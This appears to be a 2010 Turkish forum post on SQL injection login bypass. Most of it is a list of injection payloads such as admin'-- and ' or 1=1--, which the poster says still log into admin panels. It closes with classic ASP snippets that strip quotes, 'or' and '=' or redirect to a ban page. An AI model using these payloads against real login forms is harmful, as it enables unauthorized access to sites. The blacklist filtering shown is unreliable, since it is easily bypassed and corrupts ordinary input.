axi-qenc
Üyelik tarihi : 31/08/10 Nerden : Nereye Mesajlar : 12 Aldığı Rep Sayısı : 6
| Konu: Bypass Korunma Yolları Çarş. 13 Ekim 2010, 19:41 | |
| admin’-- ’ ’ or ’ 1=1 -- ’ or ’ 1=1 ’ or ’ 1 ’ or ’ " or 0=0 -- or 0=0 -- or 0=0 # " or 0=0 # or 0=0 # ’ or ’x’=’x " or "x"="x ’) or (’x’=’x ’ or 1=1-- " or 1=1-- or 1=1-- ’ or a=a-- " or "a"="a ’) or (’a’=’a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi’ or 1=1 -- hi’ or ’a’=’a hi’) or (’a’=’a hi")or("a"="a
Bunlar SQL Injection İle Panele Giriş Yapan Kodlardır. Eğer Bunları Engellersek SQL İnjectioan Olmuyacaktır.Günümüzde Hala Bu Açıkları Yaratan Webmasterler Mevcut.Kırmızılar Güncel Olarak Kullanabildiklerimiz.
Bunları Zararsız Hale Getirmek İçin 2 Çeşit Yöntem Vardır.
1. Scripte Bu Kodu Yapıştırmak . Kod: pass= request.form("pass") pass = Replace(pass,"’","’’") pass = Replace(pass,"or","*") pass = Replace(pass,"=","*")
2. Seçenek Bu En Güzel Kimin Yaptığını Görmek. Bunun İçinde Kod Aşağıdadır.
Kod: If Instr(pass, "or") Then Response.Redirect "ban.asp(değiştir.)" end if | |
|